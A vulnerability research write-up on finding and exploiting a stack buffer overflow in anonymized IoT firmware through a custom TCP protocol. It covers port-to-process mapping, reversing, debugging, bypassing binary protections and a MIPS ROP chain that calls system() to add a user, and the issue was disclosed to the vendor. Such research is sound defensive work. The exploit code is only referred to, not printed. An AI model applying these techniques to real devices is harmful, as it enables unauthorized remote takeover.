Intro
This is a writeup of a buffer overflow we discovered while toying with an outdated firmware of an IoT device. The vulnerability lied in the implementation of a custom protocol over TCP, supporting packet sizes bigger than that of the stack buffer.
The device vendor requested an anonymization of this article to buy users time to update their systems. Consequently the chapters on opening the device, dumping the firmware and getting a shell were scrapped, leaving only the discovery and exploitation of the buffer overflow.
Table of Contents
- Identifying the executables behind the listening TCP ports
- Reversing the vulnerable function
- Identifying which process listens on TCP 4649
- Observing the segfault with a debugger
- Bypassing the binary protections
- canary is false.
- pic (Position-Independent Code) is false.
- nx (No-eXecute) is true.
- Little tangent about macros and loops in radare2
- ASLR (Address Space Layout Randomization) is set to 2.
- Building the ropchain
- Exploiting the buffer overflow
- Closing words
- References
Identifying the executables behind the listening TCP ports
Since our goal is to find a remote exploitation scenario, let’s try to map the open ports with the running processes.
Let us take a look at the listening ports (user input in blue).
Not cool. Embedded systems care a lot about their sizes and often cut down on some of our beloved binary utilities.
Luckily, it is still possible to list the listening ports via procfs by reading/proc/net/tcp [1] (highlights in red).
Let’s convert the hex values into a human-friendlier format. (redacted text in italics).
We now have the listening ports and their respective TCP socket inodes.
The inodes being identifier for files, it is also possible to list them via /proc/<pid>/fd/* [2]
Here we have the PIDs that possess a file descriptor for the inodes corresponding to our listening TCP sockets.
By pairing the inodes under /proc/net/tcp with those under /proc/<pid>/fd/*, we can infer which process listens on which port.
Multiple processes run with the exact same command line, which can be explained by file descriptor inheritance.
The process listening on port 8888, it is a modded version of the lightweight SSH server dropbear. A few functions and 2 calls to system were added to the binary but will not be further explored here.
The executable ./REDACTED, listens on ports 2222 and 4649. This single binary seems to be responsible for a large part of the main functionalities of the device.
TCP port 2222 is a well documented port for this IoT device so let’s take the adventerous way and focus our efforts on the much less documented TCP port 4649.
Reversing the vulnerable function
The vulnerable executable ./REDACTED can be found in the firmware dump on the attacking machine (dark background).
We can open it in ghidra [3] and read upstream of all calls to bind until we finally get to the function handling incoming packets on TCP port 4649.
Let’s first take a look at the local variables that are going to be stored on the stack.
When the function receives a TCP packet, it only accepts it if the first 3 bytes are equal to [‘U’, -0x56, ‘\0’] (0x55AA00 in hex). Let’s call these 3 bytes the MAGIC section of the packet.
It then reads the next 3 bytes. The 1st byte is ignored, the 2nd is stored as the most significant byte and the 3rd as the least. Let’s call these the LENGTH section, as the function then reads the next LENGTH + 1 bytes.
We are going to call this section DATA, except for the last byte which should be defined as the CRC byte.
Only the last byte is checked, to ensure that it is equal to the sum of all other received bytes, we’ll define this section CRC.
If the CRC byte is correct, the whole packet is saved on the heap, at an address stored in the global variable REDACTED_BUFFER.
We can also observe that the vulnerable function sets the local buffer back to zeros
Here’s a screenshot of the local variables anoted with our newly defined packet structure.
We’re facing a pretty straightforward case of stack-based buffer overflow.
The 1048 bytes buffer can be overflowed as no check are performed against the length of the DATA section, which can grow as big as 65535 bytes (0xffff in hex).
Identifying which process listens on TCP 4649
Out of the 10 processes possessing a file descriptor pointing to the socket bound to TCP port 4649, only one is listening to it. We can find the right process by observing each one through a debugger.
Since gdb is not installed on the target device we will use our target’s busybox tftp client to download a static build of gdbserver for MIPS processors [4]
Let’s use gdb-multiarch to perfom a backtrace remotely from our attacking machine.
The process 260 currently hangs on a call to select and will return to the address 0x004bda94, located inside our vulnerable function starting at address 0x004bd50c.
We can infer that it is the one actively listening to our target TCP socket.
Observing the segfault with a debugger
Let’s try to confirm the stack buffer overflow by overwriting the return address of the vulnerable function.
The following python script sends a valid packet with a 2048 byte long data section containing a succession of unique 4 byte sequences [5]
Let’s look at the state of the stack before we send our payload.
Here’s the stack right before the packet’s CRC gets validated, we can see the buffer overflow.
If we resume the execution of the process, it crashes as it tries to jump to the return address of the function which has been overwritten by our pattern.
We can also observe that the buffer has been reset to 0 up until its expected max length.
Looking at the function’s return routine, we can see that the return address is pulled from the stack to the ra register.
The return address saved on the stack has been overwritten with 0Bs1 (0x30427331 in hex). The string 0Bs1 has on offset of 1322 in our pattern, so we now know exactly where to write the new return address in our payload.
Bypassing the binary protections
Our goal is rather straightforward, execute arbitrary commands on the target system. To define an attack plan, let’s look at the protections standing in our way.
Let’s boot up radare2 the triple A reversing framework [6]
canary is false.
The canary is a random value placed on the stack before the saved return address of the function, so we have to overwrite it before being able to overwrite the return address.
If the canary differs from its original value when the program gets to the return call, it throws an error before jumping, thus denying us the control of the process’ execution flow.
Here this protection is not used, so we will not need to hunt for canaries to exploit the buffer overflow.
pic (Position-Independent Code) is false.
Position-Independent Code is a protection that randomizes the start address of the binary in the process’ memory.
All absolute adress references are substitued with relative ones to preserve the binary execution flow.
Here it is set to false, so native code addresses and global variables addresses are both constant.
nx (No-eXecute) is true.
This protection sets the stack as non executable.
We will not be able to just put a shellcode in our payload and jump on the stack to execute it. We will need to jump to an executable memory page, like the .text section of the process.
Since the program already uses the system function, our goal will be to jump to an existing call to system with a custom string as argument. Let’s say the first one, at address 0x00425c04.
As register gp already contains the right value at the end of the vulnerable function, we’ll just need to populate a0 (register holding the first argument) with an address pointing to our custom command string.
Little tangent about macros and loops in radare2
What if we want to look at all calls to system in the binary to choose the one that best suits our needs ? Maybe one of them already moves a controllable register to a0 ?
Well in the end no call to system was that much more powerful than the first one, but the process is pretty neat as we can do better than manually seeking to each of the 36 calls.
radare2 implements automation features in the forms of macros [7] and loops [8] !
Let’s first display the end result and work our way back there.
The above command disassembles the 8 instructions preceding all calls to system in the binary, separating them with the string ——.
To do this, it first creates an unnamed macro.
Then defines the addresses to loop by executing to following inside backticks
Pretty cool !
Let us go back to the binary protections now.
ASLR (Address Space Layout Randomization) is set to 2.
A value of 2 in /proc/sys/kernel/randomize_va_space [9] means that the stack, heap, shared libraries and data sections’ start addresses will be randomized on each execution of the binary.
The vulnerable function first saves our packet in a local variable on the stack and then copies it to the heap at an address saved in the global variable REDACTED_BUFFER.
The stack and the heap may be randomized, but we still can find our packet in the heap using this global variable as a pointer.
As the MAGIC section (0x55aa00) and LENGTH section (0x008000) both contains a null byte, we would want to increase REDACTED_BUFFER until it points to the DATA section.
Interestingly, REDACTED_BUFFER + 4 always points 1056 bytes after the start of our packet, so we can just use this address instead.
REDACTED_BUFFER + 4 points to Bj0B (0x426a3042 in hex) which has an offset of 1050 bytes in our pattern. We can put our custom command string at this offset of the DATA section.
Building the ropchain
A ropchain is a succession of gadgets chained together to achieve an end goal. A gadget is a sequence of instructions fulfilling a small need, ending with a controllable jump instruction to call the next gadget in the chain.
We’ve already set our endgoal: jumping to the first call to system, located at address 0x00425c04.
For this call to execute arbitrary commands we have to populate a0 (the register holding the first argument in MIPS) with the address of our custom command string (contained in REDACTED_BUFFER + 4).
Let’s try to find a gadget that fulfills that need. We can list the available gadgets using ROPgadget [10]
It is a very nice tool that can even create the whole ropchain for you with –ropchain, but the feature is not available on MIPS yet.
We can also use radare2 with /R
In both cases that’s a lot of gadgets to sift through. Since we already control the stack, we could use a gadget that loads a value from it into the a0 register.
Let’s search for a load word instruction (lw) that takes the stack pointer (sp) as source and the register a0 as destination.
No luck.
But we also control the value of the frame pointer (fp in radare2, s8 in gdb) as it is also loaded from the stack in the vulnerable function’s return routine.
Let’s try to find gadgets with the frame pointer (fp) as source.
We got a few, but their jumps are based on v0 and not on the stack so we’ll need another gadget to populate this register…
You get it, a gadget calls for another and we need to climb up the chain until all loose ends are tied up.
Exploiting the buffer overflow
We settled on a working ropchain and filled the stack accordingly, here is how our python script looks like now.
Here is our complete custom ropchain.
Let’s send our payload and follow the execution flow with gdb.
Breaking at the end of the vulnerable function, the ra register is pointing to the first gadget in the chain;
The stack is ready to be fed into the ropchain;
And the address of our command string is stored at REDACTED_BUFFER + 4.
Breaking at the end of the 1st gadget, s1 contains the address of the endgoal, s0 the address of gadget 3 and ra the address of gadget 2.
Breaking at the end of the 2nd gadget, a1 now contains the address of the endgoal.
The 1st and 3rd gadget share the same return address. Breaking at the end of the 3rd gadget, v0 now contains the address of the endgoal and ra the address of gadget 4.
Breaking at the end of the 4th gadget, s8 (fp in radare2) contains the address REDACTED_BUFFER + 4 – 40 and ra the address of gadget 5.
Breaking at the end of the 5th gadget, a0 finally points to the command string.
Let’s continue until the crash of the process.
We receive a ping, signaling the execution of our command string.
Let’s verify that the new user has successfully been created.
We can now connect to the target device via ssh with our newly defined credentials.
And voilà, we’ve exploited the stack-based buffer overflow with a custom ropchain.
Closing words
This vulnerability was discovered while toying with the outdated firmware of an IoT device.
We contacted the vendor company without really expecting anything but the vendor not only responded but was proactive in developing a fix for this vulnerability and even gave away $600 of reward money.
IoT and embedded systems aren’t often praised for the mature security stance of their vendors so it feels like a shame that we are not able to cite them here.
References
[1] https://docs.kernel.org/networking/proc_net_tcp.html
[2] https://docs.kernel.org/filesystems/proc.html#proc-pid-fd-list-of-symlinks-to-open-files
[3] https://github.com/NationalSecurityAgency/ghidra
[4] https://github.com/secnigma/gdb-static-cross/tree/master/prebuilt
[5] https://pypi.org/project/exploit-patterns/
[6] https://github.com/radareorg/radare2
[7] https://book.rada.re/scripting/macros.html
[8] https://book.rada.re/scripting/loops.html
[9] https://www.kernel.org/doc/Documentation/sysctl/kernel.txt#randomize_va_space
[10] https://github.com/JonathanSalwan/ROPgadget